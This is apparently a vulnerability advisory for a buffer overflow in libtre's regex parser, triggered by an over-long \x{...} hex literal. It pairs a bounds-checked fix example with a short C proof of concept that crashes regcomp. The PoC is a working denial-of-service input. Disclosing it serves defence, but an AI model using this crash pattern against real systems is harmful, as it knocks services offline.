Note: this vulnerability is a duplicate of CVE-2015-3796.

Software: libtre5

A buffer overflow exists in tre_parse() when parsing a literal (e.g. \x{deadbeef}), used during regular expression compilation.

A 32-byte array is allocated to parse a "wide char" literal, but no bounds checking is done on the input. Characters are only copied to the tmp buffer if they are [0-9a-fA-F], which makes arbitrary code execution fairly difficult. Denial of service is as simple as supplying a pattern with more than 32 hex characters.
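For contrast, the following is an added example (not libtre's code) of how a fixed 32-byte buffer for a \x{...} literal can be filled with the length check the advisory says is missing: hex digits are copied until the buffer would overflow, at which point the literal is rejected rather than written past the array. The function names, HEX_LIT_MAX and the 32-byte size are assumptions chosen to mirror the advisory's description.

```c
#include <stddef.h>
#include <string.h>
#include <ctype.h>
#include <stdio.h>

/* Added example, not libtre's code: a bounds-checked reader for a \x{...}
 * hex literal of the kind the advisory describes. The constant and the
 * function names are assumptions for illustration. */
#define HEX_LIT_MAX 32   /* same fixed buffer size the advisory mentions */

/* Copies the hex digits of a \x{...} literal at s into tmp (NUL-terminated).
 * Returns the number of digits copied, or -1 if the literal is malformed
 * or would not fit in tmp_len bytes. On success *endp (if non-NULL) points
 * just past the closing '}'. */
int parse_hex_literal(const char *s, char *tmp, size_t tmp_len, const char **endp)
{
    size_t n = 0;
    if (tmp_len == 0 || strncmp(s, "\\x{", 3) != 0)
        return -1;
    s += 3;
    while (*s != '\0' && *s != '}') {
        if (!isxdigit((unsigned char)*s))
            return -1;            /* only [0-9a-fA-F] is accepted */
        if (n + 1 >= tmp_len)     /* the check the vulnerable code lacks: */
            return -1;            /* reject instead of overflowing tmp   */
        tmp[n++] = *s++;
    }
    if (*s != '}')
        return -1;                /* unterminated literal (as in the PoC) */
    tmp[n] = '\0';
    if (endp)
        *endp = s + 1;
    return (int)n;
}

/* Returns 1 if the literal at s is well-formed and fits a HEX_LIT_MAX byte
 * buffer, 0 otherwise. */
int hex_literal_is_safe(const char *s)
{
    char tmp[HEX_LIT_MAX];
    return parse_hex_literal(s, tmp, sizeof tmp, NULL) >= 0;
}

int main(void)
{
    /* Constructed inputs: a normal literal and the advisory's PoC pattern. */
    const char *ok  = "\\x{deadbeef}";
    const char *poc = "\\x{aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
    printf("%s -> %s\n", ok,  hex_literal_is_safe(ok)  ? "accepted" : "rejected");
    printf("%s -> %s\n", poc, hex_literal_is_safe(poc) ? "accepted" : "rejected");
    return 0;
}
```

With a 32-byte buffer the checked version accepts at most 31 hex digits (one byte is reserved for the terminator); the PoC pattern above is rejected before any byte is written out of bounds.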

Proof of concept:

$ cat poc.c
#include <tre/tre.h>
int main() {
  regex_t re;
  /* pattern with an over-long, unterminated \x{...} literal */
  const char *crash = "\\x{aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
  regcomp(&re, crash, 0);
  return 0;
}
$ gcc -o poc -ltre poc.c
$ ./poc
Segmentation fault